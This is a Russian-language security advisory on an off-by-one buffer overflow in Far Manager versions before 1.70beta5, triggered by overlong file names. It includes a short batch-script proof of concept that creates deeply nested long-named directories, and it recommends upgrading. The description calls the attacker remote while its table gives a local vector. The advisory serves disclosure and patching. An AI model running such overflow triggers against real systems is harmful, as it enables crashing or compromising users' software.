Переполнение буфера в Far Manager
| Дата публикации: | 12.02.2003 |
| Дата изменения: | 23.04.2007 |
| Всего просмотров: | 1706 |
| Опасность: | Низкая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Локальная |
| Воздействие: | Повышение привилегий |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | FAR Manager 1.70 |
| Уязвимые версии: Far Manager версии до 1.70beta5.
Описание: Ошибка завышения на единицу обнаружена при обработке имен файлов. Удаленный пользователь может создать специально сформированное имя файла, длиной 160 символов и выполнить произвольный код на целевой системе с привилегиями пользователя, запустившего приложение. Пример:
@echo off
SET
A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%\
URL производителя: www.rarlab.com/far_manager.htm Решение: Установите последнюю версию (1.70beta5 или выше) с сайта производителя. |